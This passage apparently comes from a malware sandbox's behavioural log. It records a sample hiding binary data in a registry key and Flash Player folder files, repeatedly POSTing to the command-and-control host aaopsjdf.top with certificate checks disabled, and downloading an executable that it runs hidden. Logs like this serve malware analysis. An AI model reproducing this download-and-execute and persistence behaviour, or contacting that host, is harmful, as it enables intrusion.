Inet Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 1688 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, size = 1776, type = REG_BINARY True 1
Fn
Data
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776 True 1
Fn
Data
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:56:49 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /yMGvio/o0sO/J9/p/TDdCp0pD/f/3Q2nAw/, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close P™9, url = aaopsjdf.top/yMGvio/o0sO/J9/p/TDdCp0pD/f/3Q2nAw/ False 1
Fn
Inet Send HTTP Request headers = Connection: close P™9, url = aaopsjdf.top/yMGvio/o0sO/J9/p/TDdCp0pD/f/3Q2nAw/ True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 3224 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\Microsoft OneDrive.rig, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\Microsoft OneDrive.rig, size = 720 True 1
Fn
Data
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Thread 0x30c
(Host: 142, Network: 106)
+
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 True 1
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:56:44 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /IQwhNdoN6/k1c-Of1YG/9PY7a/j/Hz/A6EGg, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close ùÐé8, url = aaopsjdf.top/IQwhNdoN6/k1c-Of1YG/9PY7a/j/Hz/A6EGg False 1
Fn
Inet Send HTTP Request headers = Connection: close ùÐé8, url = aaopsjdf.top/IQwhNdoN6/k1c-Of1YG/9PY7a/j/Hz/A6EGg True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 3
Fn
Data
Inet Read Response size = 4096, size_out = 3883 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 12
Fn
Data
Inet Read Response size = 4096, size_out = 4087 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 31
Fn
Data
Inet Read Response size = 4096, size_out = 4087 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 38
Fn
Data
Inet Read Response size = 4096, size_out = 703 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, size = 196608 True 1
Fn
Data
Process Create process_name = "C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe", os_pid = 0x594, creation_flags = CREATE_DEFAULT_ERROR_MODE, show_window = SW_HIDE True 1
Fn
File Delete filename = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe False 1
Fn
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Mutex Release mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 True 1
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:56:48 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /Uvg4D/j/3AuZ/fdpAv/ra4Kz/Gw3S/kI/A, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close H, url = aaopsjdf.top/Uvg4D/j/3AuZ/fdpAv/ra4Kz/Gw3S/kI/A False 1
Fn
Inet Send HTTP Request headers = Connection: close H, url = aaopsjdf.top/Uvg4D/j/3AuZ/fdpAv/ra4Kz/Gw3S/kI/A True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 3
Fn
Data
Inet Read Response size = 4096, size_out = 3883 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 12
Fn
Data
Inet Read Response size = 4096, size_out = 4087 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 22
Fn
Data
Inet Read Response size = 4096, size_out = 970 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Mutex Create mutex_name = F063546A5853AF5508DB5A15751DB34A True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, type = REG_NONE False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, size = 88160, type = REG_BINARY True 1
Fn
Data
Mutex Release mutex_name = F063546A5853AF5508DB5A15751DB34A True 1
Fn
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Mutex Release mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:56:50 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /1c2/62V7Y/NAORf7clZ/q/Cl/SPSRA, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close ã@ó8, url = aaopsjdf.top/1c2/62V7Y/NAORf7clZ/q/Cl/SPSRA False 1
Fn
Inet Send HTTP Request headers = Connection: close ã@ó8, url = aaopsjdf.top/1c2/62V7Y/NAORf7clZ/q/Cl/SPSRA True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 3
Fn
Data
Inet Read Response size = 4096, size_out = 3883 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 12
Fn
Data
Inet Read Response size = 4096, size_out = 4087 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 23
Fn
Data
Inet Read Response size = 4096, size_out = 4088 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 9
Fn
Data
Inet Read Response size = 4096, size_out = 402 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Mutex Create mutex_name = F063546A5853AF5508DB5A15751DB34A True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, size = 200848, type = REG_BINARY True 1
Fn
Data
Mutex Release mutex_name = F063546A5853AF5508DB5A15751DB34A True 1
Fn
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Mutex Release mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:56:51 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /KJ2L/k/Ux7/H/f/h2RtGl/7s/v8/7wrSO/Q, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close =@ó8, url = aaopsjdf.top/KJ2L/k/Ux7/H/f/h2RtGl/7s/v8/7wrSO/Q False 1
Fn
Inet Send HTTP Request headers = Connection: close =@ó8, url = aaopsjdf.top/KJ2L/k/Ux7/H/f/h2RtGl/7s/v8/7wrSO/Q True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 3
Fn
Data
Inet Read Response size = 4096, size_out = 3883 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 12
Fn
Data
Inet Read Response size = 4096, size_out = 4088 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 7
Fn
Data
Inet Read Response size = 4096, size_out = 4087 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 16
Fn
Data
Inet Read Response size = 4096, size_out = 3878 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Mutex Create mutex_name = F063546A5853AF5508DB5A15751DB34A True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, size = 295088, type = REG_BINARY True 1
Fn
Data
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:56:58 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
